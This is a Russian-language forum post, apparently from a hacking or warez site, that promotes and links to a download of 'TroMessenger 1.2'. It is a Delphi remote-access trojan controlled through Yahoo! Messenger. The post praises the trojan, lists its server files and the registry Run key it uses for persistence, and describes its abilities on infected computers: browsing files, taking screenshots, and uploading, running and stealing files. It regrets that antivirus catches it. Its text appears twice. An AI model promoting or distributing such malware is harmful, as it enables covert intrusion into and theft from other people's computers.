TroMessenger 1.2
Скриншот|Screenshot - настройка сервера
Скриншот|Screenshot - как происходит "общение"
Хороший троян. Написан нашими иранскими друзьями на делфях. =) более ранние версии можно наблюдать здесь
Принцип его работы остался тем же самым, через Yahoo! Messenger.[New$paN]
к сожаленю он палиться вот результаты сканирования на вирустотал:
серверная часть состоит из трёх файлов.
LoginCMD.exe - 6,144 байт
YMSG12ENCRYPT.dll - 46,080 байт
Для автозапуска он создаёт следующий ключ реестра:
с его помощью можно:
- просматривать файлы и папки
- Делать скриншоты
- баловаться с СД ромом
- Закачаивайть файлы на заражённый комп и запускать их
- И соответсвенно скачаивать с заражённого компа файлы на ваш компьютер
Более подробно ознакомится с его возможносятми можно скачав архив с ним.
Скачать|Download
спасибо мр. N3x^0r'у
Скриншот|Screenshot - настройка сервера Скриншот|Screenshot - как происходит "общение"Хороший троян. Написан нашими иранскими друзьями на делфях. =) более ранние версии можно наблюдать здесь
Принцип его работы остался тем же самым, через Yahoo! Messenger.[New$paN]
к сожаленю он палиться вот результаты сканирования на вирустотал:
серверная часть состоит из трёх файлов.
WinMsgLoader.exe - 310,272 байт
LoginCMD.exe - 6,144 байт
YMSG12ENCRYPT.dll - 46,080 байт
Для автозапуска он создаёт следующий ключ реестра:
Код:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run "WinMsgLoader"
data: C:\WINDOWS\WinMsgLoader.exe- просматривать файлы и папки
- Делать скриншоты
- баловаться с СД ромом
- Закачаивайть файлы на заражённый комп и запускать их
- И соответсвенно скачаивать с заражённого компа файлы на ваш компьютер
Более подробно ознакомится с его возможносятми можно скачав архив с ним.
Скачать|Downloadспасибо мр. N3x^0r'у